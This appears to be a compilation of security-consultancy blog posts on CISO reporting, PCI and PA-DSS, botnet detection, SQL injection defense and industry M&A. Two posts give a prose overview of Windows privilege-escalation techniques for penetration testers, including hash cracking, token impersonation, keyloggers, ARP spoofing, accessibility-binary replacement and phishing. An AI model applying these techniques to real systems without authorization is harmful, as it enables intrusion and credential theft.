Back

Where the CISO Reports

Since the role of the Chief Information Security Officer (CISO) and how he or she reports has a major impact on security and risk, I think it’s interesting to look at how different organizations have structured the position. With that said, there is very little consistency other than a correlation with the industry vertical’s understanding of IT risk.

Within financial services organizations, the CISO (occasionally the top position is given to a Chief Security Officer (CSO) that owns both physical and IT security) often reports to the Chief Information Officer (CIO). However, at many large financial services organizations, the CISO or CSO reports outside of IT, often to the Chief Risk Officer or other C-level executive.

The CISO position within healthcare has been treated quite differently. Because of HIPAA, many organizations didn’t want to promote the security manager to the CISO position, so they gave their CIO the CISO title as well. There is often a Director or Manager of Information Security a few rungs down reporting to a lower-level manager.

Information security within retail is also quite different. With the focus on PCI, the CISO or director of information security is often tied to the PCI or compliance group. Within large retailers that have loss prevention or risk departments, the CISO sometimes reports through them.

Because of their historic focus on physical security, energy companies often have a CSO or CISO that owns both the organization’s IT and physical security. In some cases I’ve seen this position report to facilities, but usually it reports into operations, and occasionally it reports to the CIO.

The military often leads industry in its adoption of information security practices. One interesting change is that security teams have taken significant ownership of IT leadership. In the case of US Cyber Command, a separate group is being set up outside of IT reporting directly to the highest levels of government. I’m not sure how this change will find its way to the private sector, but it is a very interesting precedent that will likely have an impact on information security and the CISO.

In general, the more risk-sensitive the industry, the higher the up CISOs will report, until they report entirely outside of IT. In many cases, regardless of where they fit in the reporting structure, the CISO will report regularly to the board about the state of initiatives, compliance, audits or assessments. With this type of visibility, I think it’s clear that the CISO will continue to rise in prominence, and the information security reporting structure will continue to evolve. However, it may take a compliance-related mandate within the lagging industry verticals for this to happen quickly.

Back

Healthcare Solutions and PA-DSS Compliance (with a Deadline in July)

In a post that I wrote earlier, “The Far-Reaching Impact of the PCI DSS,” I mentioned the influence of the PCI DSS on industries other than retail and hospitality. I’d like to expand on that topic by taking a look at healthcare software and the Payment Application Data Security Standard(or PA-DSS, a standard within the broader PCI DSS.)

Since the introduction of the PA-DSS, and the ‘retirement’ of the former standard (PABP), NetSPI has been constantly engaged with companies that suddenly have to address what was previously a voluntary standard and one that was considered relevant only by Point-Of-Sale (POS) vendors.

However, what has been pretty clear from the beginning is that PA-DSS is in no way limited to the retail checkout environment. As defined by the PCI SSC, the PA-DSS applies to applications that:

  • Store, process, or transmit cardholder data
  • Are sold, distributed, or licensed to third parties

It’s really pretty straightforward – if you are a software company and your product fits these two criteria, PA-DSS applies to you. That means that healthcare application companies whose products touch cardholder data now need to add PA-DSS to the list of standards they need to be concerned about. Also, I should mention that the deadline that VISA has set for PA-DSS compliance is July 2010.

Many integrated healthcare solutions are built to support a wide range of needs inside a complicated hospital or practice environment – managing workflow, interaction, and data sharing internally between departments as well as externally with patients, insurance companies, and, potentially, public health representatives.

Often these highly valuable (and highly intricate) systems were not built with a primary focus on financial transactions – they sprang from the needs of doctors, patients, and the medical system. The requirements involved with PA-DSS and the broader PCI DSS can be confusing and hard to translate for healthcare software companies that have certainly incorporated security and privacy into their products, but have traditionally focused on patient confidentiality rather than cardholder data protection.

Today, my recommendations for healthcare software companies would be:

  1. Rapidly determine if their solutions meet the criteria for PA-DSS and, if so,
  2. Quickly find a partner that belongs to the small group of seasonedPA-QSAs (it’s a fairly small group) and has significant experience with both healthcare and enterprise-level applications (an even smaller group.)

As the deadline approaches, addressing these two things is the first step in a process that really needs to be more holistic and take into account the full spectrum of security concerns that face the healthcare software community. That holistic view now includes validating against a standard that was not developed by a healthcare-centric entity, but rather by an organization that was created to ensure credit card security (regardless of the market or environment.)

Understanding where and how the PA-DSS translates into their solutions is one of the challenges for software providers in the space, and there are few knowledgeable, experienced partners to turn to as July gets closer

Back

Beyond the PCI Audit: Helping Merchants and Service Providers as a Partner

At the PCI Community Meeting last month in Las Vegas, one thing was abundantly clear – merchants and service providers need help. The confusion that comes with a complicated, comprehensive security standard, coupled with governance that shifts back and forth between the PCI-SSC and the card brands, has created a situation that requires that a QSA be more than just an auditor for their clients.

Now, I should state that I’m a full supporter of the PCI SSC and the PCI DSS – I’m not here to bash the council or the brands. Security around cardholder data is something that really needed improvement (and continues to need improvement), and the PCI DSS is really just a codified set of best practices with a tight focus on cardholder data.

At the community meeting I noticed that a number of the attendees appeared frustrated by how many times a question to the SSC (or to the card brand representatives to the SSC) elicited a response of “That’s really a brand-specific question and will need to be asked to the individual brands directly.”  By this point most companies recognize that the PCI DSS is not the overall goal for their security strategy – its narrow focus ignores a great deal that organizations need to be concerned about in terms of information security. However, today many organizations still don’t realize that PCI isn’t even ‘complete’ in addressing credit card security – the brands may have important individual guidance that supersedes the PCI DSS.

Which brings me back to my initial statement – people need help and not just audits. The merchant and service provider community is looking for leadership and for partners to work with them to understand the unique and shifting landscape of compliance and security. This includes PCI, but it also includes the broader discussion of what the individual brands require outside of the PCI DSS and the impact of decisions on overall security.

The community expects and, truthfully, deserves this leadership. After all, we’re the experts and they are putting their trust in that expertise. Yes – passing your PCI audit is very important, but it isn’t the only thing that’s important, even within credit card security.

Back

Botnet Detection and Dynamic DNS

The Internet is a vast and unforgiving wilderness; every day, some new monstrous beast rears its ugly head and threatens the hapless denizens of networks everywhere. The only thing standing between those Internet citizens and complete ownage is the security industry. This means that we have to adapt to the newest and biggest threats on the Internet. Recently, the industry has shown its vulnerability to a particularly nasty threat: botnets. This malware is dangerous because it is difficult to detect before some workstations start broadcasting administrator passwords, online credentials, or even credit card and social security numbers. What’s more, botnets can adapt to hide from common detection techniques and antivirus configurations. Prevention is, of course, the best answer, but it can’t be the only line of defense. Pfizer lost some serious credibility when its networks started uncontrollably spamming people with offers for Viagra (a product they make), and as recently as September it was revealed that over half of Fortune 100 companies had networks infected with a botnet called Mariposa. The problem isn’t a simple one.

More recent approaches to botnet detection have come in the form of network-based detection. Many botnets rely on dynamic DNS solutions to obfuscate data collection centers, and David Dagon wrote an interesting presentation on DNS-based detection of forming botnets. These dynamic DNS solutions tend to be abused by botnet owners, allowing them to hijack hundreds of third-level domains from dynamic DNS servers for use in controlling botnets or aggregating data. Fortunately, this means that the botnet will require a lot of DNS traffic during formation, and this footprint allows for easily isolation of the infected hosts, before they transform into a rampaging swarm of zerglings and spew your data all across the Internet. It won’t save anyone from an already formed botnet, and it won’t prevent a distributed denial of service attack that originates externally, but it’s another layer of protection for internal data.

Back

Preventing SQL Injection at the Database

SQL injection vulnerabilities are common out in the real world. We spend a lot of time and effort looking for SQL injection vulnerabilities in application code, a good and necessary practice. Application security, however, must be considered at every layer of the system. In fact, by using a good database and data access layer design, we can help eliminate the possibility of a SQL injection vulnerability.

True, the topic of database and data access layer design is expansive, including the use of service accounts and row-level authorization. But for now, here’s a simple way using two small requirements to make sure that the database itself is doing its part to facilitate a secure database and data access layer and to protect against SQL injection attacks.

These two requirements are:

1) All data access should occur via parameterized stored procedures.

2) Users should be limited to CONNECT and EXECUTE privileges.

By ensuring that all data access is via stored procedures, we can enforce the practice of parameterizing variables, thus eliminating the possibility of random SQL statements getting to our database. Of course, you must also make sure that your stored procedures are properly written and do not include any insecure practices such as using sp_executesql.

By limiting users to CONNECT and EXECUTE privileges, we can limit the possibility of users executing random SQL statements. If they try to SELECT anything, for example, it will fail.

Back

Are We Ready for a Security Software Assurance Program?

Integrating security checks and balances with your application development processes is certainly uncharted territory for many security professionals. Why is this so? With the multitude of benefits that custom developed applications bring to an organization, there is also a multitude of risks, namely that sensitive, regulated, and confidential data is being stored, processed, transmitted, and exchanged inside and outside the boundaries of the organization. Why don’t we have a better handle on these risks? I think that we as security professionals have missed an opportunity to embed security in the development process. Let’s begin to understand why this is and how we can go about changing it. Step back a few years to when your security program was just really getting off the ground. Developed applications were supposed to just work right. Applications either met design specs or they didn’t; wasn’t it that simple? Why did security need to be involved? Back in the day, applications were always quarantined behind the firewall, and business partners only received data via a data exchange solution. Out of scope for security, right? Now, fast forward from the days of firewalls and anti-virus concerns and take notice: everyone who has any reason to access your data can, from anywhere, anytime. Sure, you’re protecting it with a strong password, maybe even two-factor authentication, a VPN, or rock-solid acceptance and confidentiality agreements. You’re conducting vulnerability scans on the DMZ nightly, right? Would you ever dream of scanning that application nightly? In production? Are you crazy? That might cause an outage. But hold on, and consider what else you may be missing. Good application security practices require security checks and balances throughout the entire lifecycle, not just a security assessment at the end of the line. These checks and balances include things like secure coding standards, developer training, well-defined security requirements, security code reviews, the use of sanitizing test data, separation of duties, security testing during development checkpoints, security use case testing, and penetration testing. So, if that’s where we need to be, how do we get there? Is the answer Security Software Assurance Programs? They sound like a great concept, prescriptive programs that include everything from A – Z for application security; all you need to do is implement it and watch the needle on the risk meter drop. Let’s get real. Budgets are tight, development timelines are tight, and security programs are underfunded. Can you realistically launch a massive and invasive security program? Once again, I think we missed an opportunity somewhere between the 1990s and now to ensure that security and application development work in tandem. So what do you do now? I suggest you think big, but start smart. Pick two or three obvious pain points and start there, e.g., with more testing or better requirements. If there is one thing to get in there sooner than later, start training your development leads (literally, scare the daylights out of them). Keep in mind, you will need to turn this into a full-on program, so begin working towards it, but begin by re-acquainting yourself with your developers and providing them with some high value wins. Help them find security issues in-house before someone else does.

Back

Windows Privilege Escalation Part 2: Domain Admin Privileges

Introduction This is the second part of a two-part series that focuses on Windows privilege escalation. The previous post (Part 1) provided an overview of 10 vectors that could be used to obtain local SYSTEM and administrative privileges from an unprivileged user account. This post focuses on obtaining domain administrative privileges from a local administrator or domain user account. Escalation Techniques Once the initial steps have been taken to obtain local administrative access on a Windows operating system, the natural next steps are to gain domain user and domain administrative privileges. Many of the methods for gaining domain administrative privileges are the same as or similar to those used to gain local administrative privileges. So, don’t forget to try out some of the techniques used in the last post. Using the escalation vectors listed below, penetration testers often gain unauthorized access to all kinds things like applications, systems, and everyone’s favorite–domain administrator accounts.

  1. Crack Local LM Password Hashes
    A long time ago, in an LAN far away, there lived a strong password stored as an LM Hash. The penetration testers of the LAN tried brute force and dictionary attacks, but it took weeks to crack the single LM password hash. The IT administrators were pleased and felt there was security across the LAN.I think that we’ve all heard that bedtime story before, and it’s less true now than ever. Using tools like Rainbow Tables, LM password hashes can be cracked in a few minutes instead of a few weeks. Tools like these allow penetration testers to quickly crack local, service, and in some cases domain accounts. Service and domain accounts can be especially helpful for the reasons below. Service Accounts Local service accounts are commonly installed using the same passwords across an entire environment. To make matters worse (or better, depending on your perspective), many of them allow interactive login, and in extreme cases are installed on domain controllers with Domain Admin privileges. Service accounts may seem trivial at first glance, but make sure to give them the attention they deserve; it usually pays off in the end. Domain Accounts Domain accounts are nice to have for a number of reasons. First, they typically provide a penetration tester with enough privileges on the domain to look up other user accounts to target in future attacks e.g., domain administrators. Second, they typically provide testers with access to shares that haven’t been locked down properly. Finally, they provide a means for logging into other systems such as domain controllers and member servers. To be fair, most small to mid-sized companies are getting better at only allowing the storage NTLM v2 password hashes, but it seems to be something that a lot of large companies are still struggling with. So don’t forget to dump and crack those hashes. Although it’s not always that easy, sometimes it is.
  2. Impersonate Users with Pass-The-Hash Toolkit and Incognito
    Have you ever wanted to be someone else? Well, now you can. With local administrator rights to a system you can impersonate any logged-on user with the Pass-The-Hash Toolkit or Incognito tool. Both of the tools provide the functionality to list logged-on users and impersonate them on the network by manipulating LSA (Local Security Authority) logon sessions. In most cases this means domain user or administrator access. I know it’s exciting, but don’t forget to keep in mind that anti-virus and anti-malware products typically protect LSA sessions from manipulation, so they must be disabled before the tools can be used. Or for the more ambitious, modify the executable source code and recompile each program to avoid detection
  3. Install a Keylogger
    Installing key loggers on systems is a time-honored tradition practiced by hackers for generations. They can be a great vector for gathering passwords to systems, applications, and network devices. Historically, they have been pretty easy to create and conceal. However, I still recommend disabling anti-virus services, or at least creating an anti-virus exception for certain relative files types (for example, *.exe files) before installing a key logger.

    Key loggers are relatively easy to program and obfuscate, but if you’re not up to task of making your own, there are plenty of open-source and commercial options available on the Internet. Just keep in mind that most installations require local administrative access.

    Happy logging!

  4. Install a Sniffer on the Localhost
    Installing a network traffic sniffer is another vector of attack that has been practiced since the dawn of the Internet. As you might expect, sniffers can also be a great vector for gathering passwords to systems, applications, and network devices. Unfortunately, this is another one that will require local administrative access. It’s needed to install the WinPcap driver used to perform promiscuous sniffing of network traffic.Typically, the only traffic sniffed on today’s networks is broadcast traffic and traffic flowing to and from the localhost. Apparently, somewhere along the line most companies figured out that using routers and switches was a better idea than daisy-chaining hubs. Even with this limitation, sniffing traffic on the right server can yield great results, especially with the popularity of unencrypted web applications that authenticate to Active Directory. There are number of great open-source and commercial sniffing tools out there. If you don’t mind using a GUI interface, then I recommend the full WinPcap install and Wireshark. Wireshark is made for a number of platforms, has lots of great options, and is free. Alternatively, if you prefer a stealthier method of installation, I recommend using WinDump (Windows port of TCPDump) and the WinPcap distribution that comes with the Windows Nmap zip package, because it can all be installed silently without a GUI.
  5. Sniff from Network Devices

    A few of the most common vectors of attack overlooked by penetration testers are routers and switches. Typically, both device types can copy network traffic and direct it anywhere on the network for sniffing. In some cases testers can even monitor and view traffic right on the device itself. Oddly enough, many companies don’t change the default passwords and SNMP strings that protect the management of such devices. Unfortunately for penetration testers, some companies only allow read access to device configurations, but have no fear. Many of the same devices will accept and reply to SNMP queries for the TFTP image paths. Most TFTP servers don’t use authentication, which means the image can be downloaded and the device passwords can be read or cracked to gain full access.

  6. Perform Man in the Middle (MITM) AttacksOk, you caught me, I lied about only being able to sniff network traffic coming to and from the localhost. However, it was for good reason. I wanted to make the distinct point that MITM attacks are typically required to sniff network traffic flowing between remote systems on a LAN. One of the easiest ways to conduct MITM attacks is ARP spoofing. It’s a simple attack, there are lots of free tools that support it, and many companies still don’t protect against it. Explaining how ARP spoofing works will not be covered in this article, but I strongly suggest reading up on it if you are not familiar.There are a lot of ARP spoofing tools out there, but I don’t think that I’m alone is saying that Cain & Abel is a my favorite. It makes initiating an ARP spoofing attack as easy as using Notepad. In addition, it also gathers passwords for at least 20 different applications and protocols while sniffing. The fun doesn’t stop there; it also intercepts HTTPS, RDP, and FTPS communications, making it extremely valuable even against encrypted communications. In some cases MITM attacks can be more effective than all of the other escalation vectors. It can take time to sniff the right password, but on the bright side it can be done while you’re conducting other attacks – Hooray for multi-tasking!
  7. Attack Domain Controllers Directly

    If domain controllers are in scope for your penetration test, then I recommend starting there. Gaining almost any level of user access on a domain controller typically leads to domain administrator access. If SYSTEM-level access is not immediately obtained via missing patches, weak configuration, or coding issues, then (in most cases) using the other vectors of attacks listed in Parts 1 and 2 of this series should allow you to escalate your privileges.

    Remember, SYSTEM-level access on a domain controller is equivalent to domain administrator access. SYSTEM access can be easily leveraged by penetration testers to create their own domain administrator account.

  8. Online Resources
    Never underestimate the power of public information. Public registrars are a great place to find company contacts, business partners, IP Addresses, and company websites. All of which can lead to valuable information such as internal procedures, configuration files, patch levels and passwords. There have been many occasions when I’ve found internal installation procedures containing passwords on company websites, forums, and blogs.Once passwords have been found, use externally accessible login interfaces to gain access to systems and sensitive information.
  9. Buy Used Computer Equipment
    Going once, going twice, sold to the highest bidder. Sensitive information like social security numbers, credit card numbers, and account passwords are being sold every day in a neighborhood near you. Companies sell their used POS terminals, workstations, servers, and network equipment all the time. However, what many of them don’t do is take the time to securely wipe the disks. As a result, sensitive data is flying around Ebay, Craigslist, and your local auction house. I’ve personally seen POS terminals storing thousands of card numbers in clear text. Even worse, I’ve seen firewalls with configurations that allow the buyer direct VPN access to the corporate network of the company that sold the devices.
  10. Social Engineering
    Sometimes the easiest way to gain domain administrative privileges is to never touch a computer. If your part of the security community you already know what social engineering is, and what the common vectors are. However, this may be a new concept for some people, so I’ll provide a brief overview. In a nutshell, social engineering is the process of manipulating people into providing information or performing actions. Although there are many types of social engineering attacks, there are three primary vectors: in person, phone-based, and the most common, email phishing. At this point you may still be wondering how this is going to result in domain administrator access. So I’ve provide an example for each vector below. In Person Who wants to play dress up? One of the easiest ways to gain access to systems and networks is to pose as an IT vendor or internal IT staff member. Showing up unannounced can be tricky, but with a good back-story the IT director will walk you right into the data center. If you’re lucky the employees will even bring you coffee. With physical access to the systems, the network is yours for the taking. Have fun installing key loggers, backdoors, wireless access points, and adding your own accounts for future access. However, keep in mind that there is always a small chance that you’ll end up in choke hold or handcuffed by an excitable security guard, so I recommend getting a formal authorization letter before going onsite. Understandably, not everyone is keen on lying to people’s faces. If that’s the case, I recommend doing it via the phone or email instead. Over the Phone There are a number of proven techniques for conducting social engineering attacks over the phone, but depending on your goal I recommend one of two approaches. If the goal is to get a large volume of passwords and install backdoors, then target employees directly. Even if the company provides security training on an annual basis, most people tend to forget the IT procedures. If the goal is to target specific accounts, then calling the IT Support line is the way to go. Most support teams have some type of identification procedure, but in most cases a sob story and an employee number will get you access to the account. Email Phishing The superstar of the social engineering world is definitely email phishing. It is the most widely used vector for one very good reason—it’s easy to do. Attackers can set up a fake company survey on the Internet, and send phishing emails to solicit passwords with very little effort. In my experience phishing attacks have approximately an 80% success rate, and in some cases the passwords can be gathered within minutes of sending the first phishing email. Similar to phone-based attacks, targets can vary from every employee in a company to strategic individuals such as CEOs. Technical vulnerabilities can present a real threat to organizations, but when it comes to getting the best results for your energy, social engineering wins out every time. However, keep in mind that social engineering tests are not a substitute for technical testing and should be done in conjunction with traditional assessments.

Conclusion Obtaining domain administrative privileges doesn’t always require super hacker tools, but sometimes they do help. Also, when attacking the beast, go for the heart. Translation: When domain controllers are in scope, attack them first to save a lot of time. Until next time, keep shining light into the dark places. – SPS Tool and Command References

Back

Windows Privilege Escalation Part 1: Local Administrator Privileges

The process of stealing another Windows user’s identity may seem like black magic to some people, but in reality any user who understands how Windows works can pull it off. This is the first of two blog entries giving an overview of privilege escalation techniques that prove that fact. Part 1 (this entry) discusses obtaining local SYSTEM and administrative privileges from an unprivileged user account, and Part 2 will focus on obtaining domain administrative privileges from local administrator or domain user accounts.

Escalation Techniques

Weak configurations and missing patches often lead to local user and service account access. Sometimes these accounts can be used to access sensitive information directly, but usually access to the affected systems and connected networks doesn’t stop there. Using the 10 escalation vectors listed below, penetration testers can often gain unauthorized access to databases, network devices, and other systems on the network.

  1. Clear Text Passwords Stored in Files Never underestimate the efficiency of IT administrators. In their quest to play more Halo, most administrators have automated a large number of their processes and made their systems as homogeneous as possible. Although this sounds like a dream come true, the red team isn’t the only one in the crosshairs. The scripts used to automate processes and connect to databases often include clear text user names and passwords that can be used to gain unauthorized access to systems and applications. Also, because most of their systems are built from the same image, finding a security issue on one system is like finding it on all of them. So, while doing penetration tests, take the time to pick the low hanging fruit. Checking local files for sensitive credentials can be one of the easiest ways to escalate privileges. Personally, I recommend using Spider 2008 for the task. It is a great open-source tool created by the folks at Cornell University that will accept custom regex and can be used to search for sensitive information on systems, shares, and websites.
  2. Clear Text Passwords Stored in the Registry:  The registry is a hidden treasure chest of passwords and network paths. Application developers and system administrators leverage it for all kinds of interesting things, but they don’t always use encryption when they should. So spend some time browsing for passwords and network paths that could lead to secret stashes of sensitive data. I encourage people to write their own scripts or use an automated tool to search the registry for sensitive information, but feel free to use the find function in regedit if your fingers need a little exercise.
  3. Write Access to the System32 Directory:  By default, unprivileged users do not have write access to the system32 directory in Windows operating systems. However, many older applications and misguided system administrators change the permissions to avoid access errors and ensure smooth operations. Unfortunately, the result of their good intentions also allows penetration testers to avoid access errors and ensure smooth privilege escalation to local SYSTEM.Specifically, accessibility programs such system32sethc.exe (Sticky Keys), and system32utilman.exe (Windows Utility Manager) can be used to gain SYSTEM level access by replacing their executables with cmd.exe. This works because Windows doesn’t perform any file integrity checks on those files prior to login. As a result, users can create a local administrator account and disable anti-virus, among many other creative possibilities. This is one of my favorites. I hope you enjoy it as much as I have.
  4. Write Access to the All Users Startup Folder Every user on a Windows operating system has his or her own Windows startup folder that is used to start programs just for them when they log on. As luck would have it, there is also a Windows startup folder that contains programs that run for (you guessed it) ALL users when they log on. If unprivileged users have the ability to write to that directory, they can escalate their privileges on the local system and potentially the network by placing an evil executable or script in the directory and tricking a trusting user into logging into their machine. If your penetration test allows for a little bit of social engineering, I recommend calling up the help desk and asking them to sign into your system in order to help with a random computer issue. The help desk team usually has the privileges to add, edit, and remove local and domain users.
  5. Insecurely Registered Executables: When a program is installed as a Windows service or logon application, it is required to register with Windows by supplying a path to the program’s executable. If it is not registered securely, penetration testers may be able to escalate their privileges on the system by running commands under the context of the service user. Specifically, if a registered path contains spaces and is not enclosed in quotes, penetration testers may be able to execute their own program based on the registered executable path.

    Insecurely registered executables can be an easy, low-impact way to gain SYSTEM level access on a system. Although insecurely registered executables can be identified manually, I recommend using some of the automated tools available for free on the internet.
  6. Windows Services Running as SYSTEM Lots of services run as SYSTEM, but not all of them protect their files and registry keys with strong access controls. In some cases SYSTEM-level access can be obtained by overwriting files and registry keys related to SYSTEM services. For example, overwrite an executable used by a SYSTEM service with cmd.exe. If the overwrite is successful, then the next time the service calls the executable, a SYSTEM console will open. Modifying configuration files and performing DLL injection have also proven to be effective techniques. No super-secret tools are need for this vector of attack; Windows Explorer or a command console should do.
  7. Weak Application Configurations: I’ve found weak application configurations during every penetration test I’ve ever done, and in many cases they can be leveraged to gain SYSTEM-level access. Even in an age of application hardening guides and industry compliance requirements, I regularly find applications like IIS and MSSQL running as SYSTEM instead of a least privilege service account.

    I recommend doing some research on the applications installed on your target systems to determine how best to leverage their configurations.
  8. Windows At Command: I know this is an oldie, but it’s still worth mentioning, because oddly enough there are some environments out there running unpatched versions of WinNT and Windows 2000. So, for those who have not used this technique before, it may still be useful. The “AT” command is a tool that is used to schedule tasks in Windows. By default, in earlier versions of the Windows operating system the “AT” command was run as SYSTEM. As a result, users can gain access to a console with SYSTEM access when they schedule the cmd.exe as a task.
  9. Install a User-Defined Service: In some cases Windows users may have excessive rights that allow them to create services on the system using the Instrsrv.exe and Srvany.exe tools that come with the Windows NT resource kit. Instsrv.exe is used to install a program as a service, and Srvany.exe is used to run the program as a service. By default, the services installed with instsrv.exe should be configured to automatically start at boot time. However, you can also use the sc.exe command to ensure that it is configured how you want it. Either way, a restart may be required depending on your existing privileges. I’ve personally seen users in the “Power Users” group with the ability to install their own services, but it may be a coincidence. I recommend creating a Metasploit binary that adds a local administrator to the system, and using it to create the service. It’s easy, and the new administrator account can be used to sign in via remote desktop. However, if that’s not your cup of tea, feel free to use your favorite payloads.
  10. Local and Remote Exploits:  Managing and distributing patches for third-party software seem to be among the greatest challenges facing IT today. This is bad news for IT, but good news for penetration testers, because it leaves vectors of attack open. Exploiting local and remote vulnerabilities can provide SYSTEM-level access with very little effort, and—with a little luck—domain administrator access. However, they can have some negative impacts on sensitive systems, like crashing them. If that is not a problem in the environment you’re working in, then more power to you. However, if you’re working with people who don’t like their systems to crash unexpectedly, then take the time to understand the exploits and avoid using the ones that have a history of negative effects. There are a number of great open-source and commercial toolsets available for exploiting known software vulnerabilities. However, the frontrunners seem to be Metasploit, Canvas, and Core Impact. They all have a variety of options and exploits, but I recommend using the one that fits your immediate needs and budget.

Conclusion

Usually, it doesn’t require super hack tools or a degree in wizardry to perform local privilege escalation as an unprivileged user. What it does require is enough understanding of how Windows works to use it against itself. Until next time, keep shining light into the dark places. – SPS

Tool and Command References

Back

Mergers & Acquisitions in the Information Security Field

The news about the sale of the VeriSign consulting team to AT&T suggests that there will be many similar transactions in the near term within the information security market. The investment being made in this market is great, but based on previous experience, a positive outcome is less than certain. From my point of view there have been three stages of roll-up/investment in the market, and each has had limited success.

This first stage included some winners like the VeriSign IPO, and some less successful acquisitions–like The Wheel Group with NetRanger and NetSonar. The acquisitions continued through the end of the Internet boom, with Symantec leading the charge with acquisitions ranging from Raptor/Axent to Riptech. Overall, the outcome was marginal. Many of the purchases were product-oriented, and most of the products are now gone. However, the managed services organizations like Riptech and the independent spin-off of Secure Computing’s consulting team (Guardent) lived on to do fairly well.

The second stage started with the acquisition of Guardent and was followed by similar transactions with Foundstone and @Stake. The NetSPI team had looked at these firms as the industry leaders to be emulated; however, the rumor was that these sales were driven by the investment bankers’ fears of a market downturn (which turned out to be correct). There were other purchases around this time that also fit into a similar category, like BT’s purchase of Counterpane.

With improved market conditions, the IBM purchase of ISS and the MCI purchase of NetSec with the following conglomeration with Cybertrust fall into a third stage. The outcome of these appears to have been OK, but, as with all mergers, there appears to have been some misalignment. As we’re now seeing, Guardent and the related MSS group are being spun-off from VeriSign. This stage now includes the roll-up of security assessment product companies like Sanctum, SPI Dynamics, and Ounce by major technology integrators. Other real and rumored roll-ups include mid-sized VARs like Fishnet and Accuvant purchasing similar companies.

With the VeriSign consulting announcement, we are seeing the continued consolidation of the market. There will likely be more acquisitions, and it will affect the security market and its consumers in good and bad ways. On the positive side, the industry does not yet have a focused leader with a consolidated offering. Symantec and McAfee tried to play this role, but they appear to have given up on it. IBM may have the offering, but since they offer so much else, I wouldn’t call them the security industry leader.

The current trend of carriers and major technology players getting into the space means larger and more consolidated security offerings. The lack of focus may limit the ability of these large firms to continue to offer boutique-oriented services. Additionally, roll-ups that combine security with other offerings introduce a lack of independence. This is a huge issue that doesn’t get discussed much, but it’s one that no firm has truly overcome. It will be interesting to see how the remainder of the product companies fit into this stage. nCircle and Fortify are organizations to watch in this regard. It will also be interesting to see how successful the carriers like AT&T and the major tech players like IBM and HP are at integrating security consulting into their organizations.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X